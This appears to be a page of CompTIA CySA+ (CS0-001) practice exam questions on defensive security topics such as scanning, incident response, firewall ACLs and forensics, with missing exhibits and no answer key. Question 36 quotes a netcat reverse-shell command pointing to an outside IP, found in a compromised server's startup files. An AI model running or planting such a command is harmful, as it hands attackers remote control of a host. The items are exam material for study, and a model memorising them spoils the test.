
Note! CS0-001 has been withdrawn. The new exam code is CS0-002

CS0-001 CompTIA CySA+ Certification Exam Questions and Answers

Question # 6

A security analyst wants to scan the network for active hosts. Which of the following host characteristics help to differentiate between a virtual and physical host?

A.

Reserved MACs

B.

Host IPs

C.

DNS routing tables

D.

Gateway settings

Question # 7

A cybersecurity analyst was hired to resolve a security issue within a company after it was reported that many employee account passwords had been compromised. Upon investigating the incident, the cybersecurity analyst found that a brute force attack was launched against the company.

Which of the following remediation actions should the cybersecurity analyst recommend to senior management to address these security issues?

A.

Prohibit password reuse using a GPO.

B.

Deploy multifactor authentication.

C.

Require security awareness training.

D.

Implement DLP solution.

Question # 8

A security analyst is attempting to configure a vulnerability scan for a new segment on the network. Given the requirement to prevent credentials from traversing the network while still conducting a credentialed scan, which of the following is the BEST choice?

A.

Install agents on the endpoints to perform the scan

B.

Provide each endpoint with vulnerability scanner credentials

C.

Encrypt all of the traffic between the scanner and the endpoint

D.

Deploy scanners with administrator privileges on each endpoint

Question # 9

A company has several internal-only, web-based applications on the internal network. Remote employees are allowed to connect to the internal corporate network with a company-supplied VPN client. During a project to upgrade the internal application, contractors were hired to work on a database server and were given copies of the VPN client so they could work remotely. A week later, a security analyst discovered an internal web-server had been compromised by malware that originated from one of the contractor’s laptops. Which of the following changes should be made to BEST counter the threat presented in this scenario?

A.

Create a restricted network segment for contractors, and set up a jump box for the contractors to use to access internal resources.

B.

Deploy a web application firewall in the DMZ to stop Internet-based attacks on the web server.

C.

Deploy an application layer firewall with network access control lists at the perimeter, and then create alerts for suspicious Layer 7 traffic.

D.

Require the contractors to bring their laptops on site when accessing the internal network instead of using the VPN from a remote location.

E.

Implement NAC to check for updated anti-malware signatures and location-based rules for PCs connecting to the internal network.

Question # 10

After reviewing the following packet, a cybersecurity analyst has discovered an unauthorized service is running on a company’s computer.

[Exhibit: packet capture image not included]

Which of the following ACLs, if implemented, will prevent further access ONLY to the unauthorized service and will not impact other services?

A.

DENY TCP ANY HOST 10.38.219.20 EQ 3389

B.

DENY IP HOST 10.38.219.20 ANY EQ 25

C.

DENY IP HOST 192.168.1.10 HOST 10.38.219.20 EQ 3389

D.

DENY TCP ANY HOST 192.168.1.10 EQ 25

Question # 11

Creating a lessons learned report following an incident will help an analyst to communicate which of the following information? (Select TWO)

A.

Root cause analysis of the incident and the impact it had on the organization

B.

Outline of the detailed reverse engineering steps for management to review

C.

Performance data from the impacted servers and endpoints to report to management

D.

Enhancements to the policies and practices that will improve business responses

E.

List of IP addresses, applications, and assets

Question # 12

A security analyst is performing a review of Active Directory and discovers two new user accounts in the accounting department. Neither of the users has elevated permissions, but accounts in the group are given access to the company’s sensitive financial management application by default. Which of the following is the BEST course of action?

A.

Follow the incident response plan for the introduction of new accounts

B.

Disable the user accounts

C.

Remove the accounts’ access privileges to the sensitive application

D.

Monitor the outbound traffic from the application for signs of data exfiltration

E.

Confirm the accounts are valid and ensure role-based permissions are appropriate

Question # 13

A cybersecurity professional typed in a URL and discovered the admin panel for the e-commerce application is accessible over the open web with the default password. Which of the following is the MOST secure solution to remediate this vulnerability?

A.

Rename the URL to a more obscure name, whitelist all corporate IP blocks, and require two-factor authentication.

B.

Change the default password, whitelist specific source IP addresses, and require two-factor authentication.

C.

Whitelist all corporate IP blocks, require an alphanumeric passphrase for the default password, and require two-factor authentication.

D.

Change the username and default password, whitelist specific source IP addresses, and require two-factor authentication.

Question # 14

A software assurance lab is performing a dynamic assessment on an application by automatically generating and inputting different, random data sets to attempt to cause an error/failure condition. Which of the following software assessment capabilities is the lab performing AND during which phase of the SDLC should this occur? (Select two.)

A.

Fuzzing

B.

Behavior modeling

C.

Static code analysis

D.

Prototyping phase

E.

Requirements phase

F.

Planning phase

Question # 15

An analyst wants to use a command line tool to identify open ports and running services on a host along with the application that is associated with those services and port. Which of the following should the analyst use?

A.

Wireshark

B.

Qualys

C.

netstat

D.

nmap

E.

ping

Question # 16

Review the following results:

[Exhibit: results image not included]

Which of the following has occurred?

A.

This is normal network traffic.

B.

123.120.110.212 is infected with a Trojan.

C.

172.29.0.109 is infected with a worm.

D.

172.29.0.109 is infected with a Trojan.

Question # 17

An executive tasked a security analyst to aggregate past logs, traffic, and alerts on a particular attack vector. The analyst was then tasked with analyzing the data and making predictions on future complications regarding this attack vector. Which of the following types of analysis is the security analyst MOST likely conducting?

A.

Trend analysis

B.

Behavior analysis

C.

Availability analysis

D.

Business analysis

Question # 18

A systems administrator is trying to secure a critical system. The administrator has placed the system behind a firewall, enabled strong authentication, and required all administrators of this system to attend mandatory training.

Which of the following BEST describes the control being implemented?

A.

Audit remediation

B.

Defense in depth

C.

Access control

D.

Multifactor authentication

Question # 19

Which of the following are essential components within the rules of engagement for a penetration test? (Select TWO).

A.

Schedule

B.

Authorization

C.

List of system administrators

D.

Payment terms

E.

Business justification

Question # 20

A red team actor observes it is common practice to allow cell phones to charge on company computers, but access to the memory storage is blocked. Which of the following are common attack techniques that take advantage of this practice? (Choose two.)

A.

A USB attack that tricks the computer into thinking the connected device is a keyboard, and then sends characters one at a time as a keyboard to launch the attack (a prerecorded series of keystrokes)

B.

A USB attack that turns the connected device into a rogue access point that spoofs the configured wireless SSIDs

C.

A Bluetooth attack that modifies the device registry (Windows PCs only) to allow the flash drive to mount, and then launches a Java applet attack

D.

A Bluetooth peering attack called “Snarfing” that allows Bluetooth connections on blocked device types if physically connected to a USB port

E.

A USB attack that tricks the system into thinking it is a network adapter, then runs a user password hash gathering utility for offline password cracking

Question # 21

During the forensic phase of a security investigation, it was discovered that an attacker was able to find private keys on a poorly secured team shared drive. The attacker used those keys to intercept and decrypt sensitive traffic on a web server. Which of the following describes this type of exploit and the potential remediation?

A.

Session hijacking; network intrusion detection sensors

B.

Cross-site scripting; increased encryption key sizes

C.

Man-in-the-middle; well-controlled storage of private keys

D.

Rootkit; controlled storage of public keys

Question # 22

A threat intelligence analyst who works for a financial services firm received this report:

“There has been an effective waterhole campaign residing at www.bankfinancecompsoftware.com. This domain is delivering ransomware. This ransomware variant has been called “LockMaster” by researchers due to its ability to overwrite the MBR, but this term is not a malware signature. Please execute a defensive operation regarding this attack vector.”

The analyst ran a query and has assessed that this traffic has been seen on the network. Which of the following actions should the analyst do NEXT? (Select TWO).

A.

Advise the firewall engineer to implement a block on the domain

B.

Visit the domain and begin a threat assessment

C.

Produce a threat intelligence message to be disseminated to the company

D.

Advise the security architects to enable full-disk encryption to protect the MBR

E.

Advise the security analysts to add an alert in the SIEM on the string “LockMaster”

F.

Format the MBR as a precaution

Question # 23

Alerts have been received from the SIEM, indicating infections on multiple computers. Based on threat characteristics, these files were quarantined by the host-based antivirus program. At the same time, additional alerts in the SIEM show multiple blocked URLs from the address of the infected computers; the URLs were classified as uncategorized. The domain location of the IP address of the URLs that were blocked is checked, and it is registered to an ISP in Russia. Which of the following steps should be taken NEXT?

A.

Remove those computers from the network and replace the hard drives. Send the infected hard drives out for investigation.

B.

Run a full antivirus scan on all computers and use Splunk to search for any suspicious activity that happened just before the alerts were received in the SIEM.

C.

Run a vulnerability scan and patch discovered vulnerabilities on the next patching cycle. Have the users restart their computers. Create a use case in the SIEM to monitor failed logins on the infected computers.

D.

Install a computer with the same settings as the infected computers in the DMZ to use as a honeypot. Permit the URLs classified as uncategorized to and from that host.

Question # 24

A cybersecurity analyst has several log files to review. Instead of using grep and cat commands, the analyst decides to find a better approach to analyze the logs. Given a list of tools, which of the following would provide a more efficient way for the analyst to conduct a timeline analysis, do keyword searches, and output a report?

A.

Kali

B.

Splunk

C.

Syslog

D.

OSSIM

Question # 25

A company invested ten percent of its entire annual budget in security technologies. The Chief Information Officer (CIO) is convinced that, without this investment, the company will risk being the next victim of the same cyber attack its competitor experienced three months ago. However, despite this investment, users are sharing their usernames and passwords with their coworkers to get their jobs done. Which of the following will eliminate the risk introduced by this practice?

A.

Invest in and implement a solution to ensure non-repudiation

B.

Force a daily password change

C.

Send an email asking users not to share their credentials

D.

Run a report on all users sharing their credentials and alert their managers of further actions

Question # 26

Which of the following stakeholders would need to be aware of an e-discovery notice received by the security office about an ongoing case within the manufacturing department?

A.

Board of trustees

B.

Human resources

C.

Legal

D.

Marketing

Question # 27

During a review of security controls, an analyst was able to connect to an external, unsecured FTP server from a workstation. The analyst was troubleshooting and reviewed the ACLs of the segment firewall the workstation is connected to:

[Exhibit: firewall ACL image not included]

Based on the ACLs above, which of the following explains why the analyst was able to connect to the FTP server?

A.

FTP was explicitly allowed in Seq 8 of the ACL.

B.

FTP was allowed in Seq 10 of the ACL.

C.

FTP was allowed as being included in Seq 3 and Seq 4 of the ACL.

D.

FTP was allowed as being outbound from Seq 9 of the ACL.

Question # 28

A cybersecurity analyst is reviewing the following outputs:

[Exhibit: command output image not included]

Which of the following can the analyst infer from the above output?

A.

The remote host is redirecting port 80 to port 8080.

B.

The remote host is running a service on port 8080.

C.

The remote host’s firewall is dropping packets for port 80.

D.

The remote host is running a web server on port 80.

Question # 29

A SIEM analyst noticed a spike in activities from the guest wireless network to several electronic health record (EHR) systems. After further analysis, the analyst discovered that a large volume of data has been uploaded to a cloud provider in the last six months. Which of the following actions should the analyst do FIRST?

A.

Contact the Office of Civil Rights (OCR) to report the breach

B.

Notify the Chief Privacy Officer (CPO)

C.

Activate the incident response plan

D.

Put an ACL on the gateway router

Question # 30

A security analyst is concerned that unauthorized users can access confidential data stored in the production server environment. All workstations on a particular network segment have full access to any server in production. Which of the following should be deployed in the production environment to prevent unauthorized access? (Choose two.)

A.

DLP system

B.

Honeypot

C.

Jump box

D.

IPS

E.

Firewall

Question # 31

An audit has revealed that the database administrator is also responsible for auditing database changes and backup logs. Which of the following access control methodologies would BEST mitigate this concern?

A.

Time-of-day restriction

B.

Separation of duties

C.

Principle of least privilege

D.

Role-based access control

Question # 32

A security administrator must prioritize the latest vulnerability scan results for remediation. According to the common vulnerability scoring system, which of the following vulnerability scores is considered to have a HIGH severity?

A.

5.4

B.

6.7

C.

7.9

D.

10

Question # 33

A cyber-incident response team is responding to a network intrusion incident on a hospital network. Which of the following must the team prepare to allow the data to be used in court as evidence?

A.

Computer forensics form

B.

HIPAA response form

C.

Chain of custody form

D.

Incident form

Question # 34

An analyst is detecting Linux machines on a Windows network. Which of the following tools should be used to detect a computer operating system?

A.

whois

B.

netstat

C.

nmap

D.

nslookup

Question # 35

A small company is publishing a new web application to receive customer feedback related to its products. The web server will only host a form to receive the customer feedback and store it in a local database. The web server is placed in a DMZ network, and the web service and filesystem have been hardened. However, the cybersecurity analyst discovers data from the database can be mined from over the Internet. Which of the following should the cybersecurity analyst recommend be done to provide temporary mitigation from unauthorized access to the database?

A.

Configure the database to listen for incoming connections on the internal network.

B.

Change the database connection string and apply necessary patches.

C.

Configure an ACL in the border firewall to block all connections to the web server for ports different than 80 and 443.

D.

Deploy a web application firewall to protect the web application from attacks to the database.

Question # 36

A security analyst is investigating the possible compromise of a production server for the company’s public-facing portal. The analyst runs a vulnerability scan against the server and receives the following output:

[Exhibit: vulnerability scan output image not included]

In some of the portal’s startup command files, the following command appears:

nc -o /bin/sh 72.14.1.36 4444

Investigating further, the analyst runs Netstat and obtains the following output

[Exhibit: netstat output image not included]

Which of the following is the best step for the analyst to take NEXT?

A.

Initiate the security incident response process

B.

Recommend training to avoid mistakes in production command files

C.

Delete the unknown files from the production servers

D.

Patch a new vulnerability that has been discovered

E.

Manually review the robots.txt file for errors

Question # 37

Now regulations have come out that require a company to conduct regular vulnerability scans. Not wanting to be found with a vulnerability during an audit, the company wants the most accurate and complete vulnerability scan. Which of the following BEST meets this objective?

A.

Regression scan

B.

Port scan

C.

SCAP scan

D.

Agent-based scan

Question # 38

Joe, a user, is unable to launch an application on his laptop, which he typically uses on a daily basis. Joe informs a security analyst of the issue. After an online database comparison, the security analyst checks the SIEM and notices alerts indicating certain .txt and .dll files are blocked. Which of the following tools would generate these logs?

A.

Antivirus

B.

HIPS

C.

Firewall

D.

Proxy

Question # 39

A list of vulnerabilities has been reported in a company’s most recent scan of a server. The security analyst must review the vulnerabilities and decide which ones should be remediated in the next change window and which ones can wait or may not need patching pending further investigation. Which of the following vulnerabilities should the analyst remediate FIRST?

A.

The analyst should remediate https (443/tcp) first. This web server is susceptible to banner grabbing and was fingerprinted as Apache/1.3.27-9 on Linux w/ mod_fastcgi.

B.

The analyst should remediate dns (53/tcp) first. The remote BIND 9 DNS server is susceptible to a buffer overflow, which may allow an attacker to gain a shell on this host or disable this server.

C.

The analyst should remediate imaps (993/tcp) first. The SSLv2 suite offers five strong ciphers and two weak “export class” ciphers.

D.

The analyst should remediate ftp (21/tcp) first. An outdated version of FTP is running on this port. If it is not in use, it should be disabled.

Question # 40

A vulnerability analyst needs to identify all systems with unauthorized web servers on the 10.1.1.0/24 network. The analyst uses the following default Nmap scan:

nmap -sV -p 1-65535 10.1.1.0/24

Which of the following would be the result of running the above command?

A.

This scan checks all TCP ports.

B.

This scan probes all ports and returns open ones.

C.

This scan checks all TCP ports and returns versions.

D.

This scan identifies unauthorized servers.

Question # 41

A company provides wireless connectivity to the internal network from all physical locations for company-owned devices. Users were able to connect the day before, but now all users have reported that when they connect to an access point in the conference room, they cannot access company resources. Which of the following BEST describes the cause of the problem?

A.

The access point is blocking access by MAC address. Disable MAC address filtering.

B.

The network is not available. Escalate the issue to network support.

C.

Expired DNS entries on users’ devices. Request the affected users perform a DNS flush.

D.

The access point is a rogue device. Follow incident response procedures.

Question # 42

A security analyst discovers a network intrusion and quickly solves the problem by closing an unused port. Which of the following should be completed?

A.

Vulnerability report

B.

Memorandum of agreement

C.

Reverse-engineering incident report

D.

Lessons learned report

Question # 43

Company A’s security policy states that only PKI authentication should be used for all SSH accounts. A security analyst from Company A is reviewing the following auth.log and configuration settings:

[Exhibit: auth.log and sshd_config image not included]

Which of the following changes should be made to the following sshd_config file to establish compliance with the policy?

A.

Change PermitRootLogin no to #PermitRootLogin yes

B.

Change ChallengeResponseAuthentication yes to ChallengeResponseAuthentication no

C.

Change PubkeyAuthentication yes to #PubkeyAuthentication yes

D.

Change #AuthorizedKeysFile sh/.ssh/authorized_keys to AuthorizedKeysFile sh/.ssh/authorized_keys

E.

Change PasswordAuthentication yes to PasswordAuthentication no

Question # 44

A company has implemented WPA2, a 20-character minimum for the WiFi passphrase, and a new WiFi passphrase every 30 days, and has disabled SSID broadcast on all wireless access points. Which of the following is the company trying to mitigate?

A.

Downgrade attacks

B.

Rainbow tables

C.

SSL pinning

D.

Forced deauthentication

Question # 45

A security analyst is trying to capture network traffic on a web server that is suspected of using the DNS service for exfiltrating information out of the network. The server usually transfers several gigabytes of data per day, and the analyst wants the size of the capture to be as reduced as possible. Which of the following commands should the analyst use to achieve such goals?

A.

tcpdump tcp port 53 -i eth0 -w evidencel.pcap

B.

tcpdump udp port 53 -i eth0 -w evidencel.pcap

C.

tcpdump port 53 -i eth0 -w evidencel.pcap

D.

tcpdump -i echo -w evidencel.pcap

Question # 46

The human resources division is moving all of its applications to an IaaS cloud. The Chief Information Officer (CIO) has asked the security architect to design the environment securely to prevent the IaaS provider from accessing its data-at-rest and data-in-transit within the infrastructure. Which of the following security controls should the security architect recommend?

A.

Implement a non-data breach agreement

B.

Ensure all backups are remote outside the control of the IaaS provider

C.

Ensure all of the IaaS provider’s workforce passes stringent background checks

D.

Render data unreadable through the use of appropriate tools and techniques

Question # 47

While reviewing three months of logs, a security analyst notices probes from random company laptops going to SCADA equipment at the company’s manufacturing location. Some of the probes are getting responses from the equipment even though firewall rules are in place, which should block this type of unauthorized activity. Which of the following should the analyst recommend to keep this activity from originating from company laptops?

A.

Implement a group policy on company systems to block access to SCADA networks.

B.

Require connections to the SCADA network to go through a forwarding proxy.

C.

Update the firewall rules to block SCADA network access from those laptop IP addresses.

D.

Install security software and a host-based firewall on the SCADA equipment.

Question # 48

An analyst has informed the Chief Executive Officer (CEO) of a company that a security breach has just occurred. The risk manager was unaware and caught off-guard when the CEO asked for further information. Which of the following should be implemented to ensure the risk manager is knowledgeable of any future breaches?

A.

Incident management

B.

Lessons learned report

C.

Chain of custody management

D.

Change control process

Question # 49

An organization has recently found some of its sensitive information posted to a social media site. An investigation has identified large volumes of data leaving the network with the source traced back to host 192.168.1.13. An analyst performed a targeted Nmap scan of this host with the results shown below:

[Exhibit: Nmap scan results image not included]

Subsequent investigation has allowed the organization to conclude that all of the well-known, standard ports are secure. Which of the following services is the problem?

A.

winHelper

B.

ssh

C.

rpcbind

D.

timbuktu-serv1

E.

mysql

Question # 50

A hacker issued a command and received the following response:

[Exhibit: command response image not included]

Which of the following describes what the hacker is attempting?

A.

Penetrating the system

B.

Performing a zombie scan

C.

OS fingerprinting

D.

Topology discovery

Question # 51

A company has monthly scheduled windows for patching servers and applying configuration changes. Out-of-window changes can be done, but they are discouraged unless absolutely necessary. The systems administrator is reviewing the weekly vulnerability scan report that was just released. Which of the following vulnerabilities should the administrator fix without waiting for the next scheduled change window?

A.

The administrator should fix dns (53/tcp). BIND ‘NAMED’ is an open-source DNS server from ISC.org. The BIND-based NAMED server (or DNS servers) allow remote users to query for version and type information.

B.

The administrator should fix smtp (25/tcp). The remote SMTP server is insufficiently protected against relaying. This means spammers might be able to use the company’s mail server to send their emails to the world.

C.

The administrator should fix http (80/tcp). An information leak occurs on Apache web servers with the UserDir module enabled, allowing an attacker to enumerate accounts by requesting access to home directories and monitoring the response.

D.

The administrator should fix http (80/tcp). The ‘greeting.cgi’ script is installed. This CGI has a well-known security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon.

E.

The administrator should fix general/tcp. The remote host does not discard TCP SYN packets that have the FIN flag set. Depending on the kind of firewall a company is using, an attacker may use this flaw to bypass its rules.

Question # 52

A security analyst has concluded that suspicious intermittent network activity is coming from one or more systems using random IP addresses and MAC addresses. The same IP or MAC address is not used twice. Which of the following is the BEST course of action to identify the source of the suspicious activity when it resumes?

A.

Configure a dynamic sinkhole.

B.

Review the firewall logs.

C.

Trace down to the switchport

D.

Review the network IDS logs.

Question # 53

A corporation has implemented an 802.1X wireless network using self-signed certificates. Which of the following represents a risk to wireless users?

A.

Buffer overflow attacks

B.

Cross-site scripting attacks

C.

Man-in-the-middle attacks

D.

Denial of service attacks

Question # 54

A web application has a newly discovered vulnerability in the authentication method used to validate known company users. The user ID of Admin with a password of “password” grants elevated access to the application over the Internet. Which of the following is the BEST method to discover the vulnerability before a production deployment?

A.

Manual peer review

B.

User acceptance testing

C.

Input validation

D.

Stress test the application

Question # 55

A security analyst received a compromised workstation. The workstation’s hard drive may contain evidence of criminal activities. Which of the following is the FIRST thing the analyst must do to ensure the integrity of the hard drive while performing the analysis?

A.

Make a copy of the hard drive.

B.

Use write blockers.

C.

Run rm -R command to create a hash.

D.

Install it on a different machine and explore the content.

Question # 56

A security professional is analyzing the results of a network utilization report. The report includes the following information:

[Exhibit: network utilization report image not included]

Which of the following servers needs further investigation?

A.

hr.dbprod.01

B.

R&D.file.srvr.01

C.

mrktg.file.srvr.02

D.

web.srvr.03

Question # 57

Using a heuristic system to detect an anomaly in a computer’s baseline, a system administrator was able to detect an attack even though the company signature based IDS and antivirus did not detect it. Further analysis revealed that the attacker had downloaded an executable file onto the company PC from the USB port, and executed it to trigger a privilege escalation flaw. Which of the following attacks has MOST likely occurred?

A.

Cookie stealing

B.

Zero-day

C.

Directory traversal

D.

XML injection

Question # 58

A company wants to update its acceptable use policy (AUP) to ensure it relates to the newly implemented password standard, which requires sponsored authentication of guest wireless devices. Which of the following is MOST likely to be incorporated in the AUP?

A.

Sponsored guest passwords must be at least ten characters in length and contain a symbol.

B.

The corporate network should have a wireless infrastructure that uses open authentication standards.

C.

Guests using the wireless network should provide valid identification when registering their wireless devices.

D.

The network should authenticate all guest users using 802.1x backed by a RADIUS or LDAP server.

Question # 59

A security analyst suspects that a workstation may be beaconing to a command and control server. Inspect the logs from the company’s web proxy server and the firewall to determine the best course of action to take in order to neutralize the threat with minimum impact to the organization.

Instructions:

Modify the firewall ACL, using the Firewall ACL form to mitigate the issue.

If at any time you would like to bring back the initial state of the simulation, please select the Reset All button.

[Exhibit: simulation (proxy logs, firewall logs, Firewall ACL form) image not included]

Question # 60

After scanning the main company’s website with the OWASP ZAP tool, a cybersecurity analyst is reviewing the following warning:

[Exhibit: OWASP ZAP warning image not included]

The analyst reviews a snippet of the offending code:

[Exhibit: code snippet image not included]

Which of the following is the BEST course of action based on the above warning and code snippet?

A.

The analyst should implement a scanner exception for the false positive.

B.

The system administrator should disable SSL and implement TLS.

C.

The developer should review the code and implement a code fix.

D.

The organization should update the browser GPO to resolve the issue.

Question # 61

An administrator has been investigating the way in which an actor had been exfiltrating confidential data from a web server to a foreign host. After a thorough forensic review, the administrator determined the server’s BIOS had been modified by rootkit installation. After removing the rootkit and flashing the BIOS to a known good state, which of the following would BEST protect against future adversary access to the BIOS, in case another rootkit is installed?

A.

Anti-malware application

B.

Host-based IDS

C.

TPM data sealing

D.

File integrity monitoring

Question # 62

An analyst has initiated an assessment of an organization’s security posture. As a part of this review, the analyst would like to determine how much information about the organization is exposed externally. Which of the following techniques would BEST help the analyst accomplish this goal? (Select two.)

A.

Fingerprinting

B.

DNS query log reviews

C.

Banner grabbing

D.

Internet searches

E.

Intranet portal reviews

F.

Sourcing social network sites

G.

Technical control audits

Question # 63

A security analyst is reviewing IDS logs and notices the following entry:

CS0-001 question answer

Which of the following attacks is occurring?

A.

Cross-site scripting

B.

Header manipulation

C.

SQL injection

D.

XML injection

Question # 64

A security analyst has determined that the user interface on an embedded device is vulnerable to common SQL injections. The device is unable to be replaced, and the software cannot be upgraded. Which of the following should the security analyst recommend to add additional security to this device?

A.

The security analyst should recommend this device be placed behind a WAF.

B.

The security analyst should recommend an IDS be placed on the network segment.

C.

The security analyst should recommend this device regularly export the web logs to a SIEM system.

D.

The security analyst should recommend this device be included in regular vulnerability scans.

Question # 65

Which of the following items represents a document that includes detailed information on when an incident was detected, how impactful the incident was, and how it was remediated, in addition to incident response effectiveness and any identified gaps needing improvement?

A.

Forensic analysis report

B.

Chain of custody report

C.

Trends analysis report

D.

Lessons learned report

Question # 66

A security analyst has been asked to remediate a server vulnerability. Once the analyst has located a patch for the vulnerability, which of the following should happen NEXT?

A.

Start the change control process.

B.

Rescan to ensure the vulnerability still exists.

C.

Implement continuous monitoring.

D.

Begin the incident response process.

Question # 67

While a threat intelligence analyst was researching an indicator of compromise on a search engine, the web proxy generated an alert regarding the same indicator. The threat intelligence analyst states that related sites were not visited but were searched for in a search engine. Which of the following MOST likely happened in this situation?

A.

The analyst is not using the standard approved browser.

B.

The analyst accidentally clicked a link related to the indicator.

C.

The analyst has prefetch enabled on the browser in use.

D.

The alert is unrelated to the analyst’s search.

Question # 68

Company A permits visiting business partners from Company B to utilize Ethernet ports available in Company A’s conference rooms. This access is provided to allow partners the ability to establish VPNs back to Company B’s network. The security architect for Company A wants to ensure partners from Company B are able to gain direct Internet access from available ports only, while Company A employees can gain access to the Company A internal network from those same ports. Which of the following can be employed to allow this?

A.

ACL

B.

SIEM

C.

MAC

D.

NAC

E.

SAML
